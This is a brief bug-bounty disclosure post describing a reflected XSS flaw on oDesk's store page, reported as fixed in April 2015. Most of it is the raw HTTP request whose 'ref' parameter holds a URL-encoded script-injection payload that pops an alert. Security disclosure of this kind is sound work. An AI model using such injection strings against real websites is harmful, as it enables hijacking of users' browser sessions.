Bug Bounty on ODESK

Standard

While surfing odesk website, i was able to find XSS reflective on their store page. Odesk Accepted this after 2 months, This bug is now fixed on 8th April 2015.

XSS

Request

GET /store/index.php?_=basket&ref=%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E HTTP/1.1
Host: www.odesklabs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive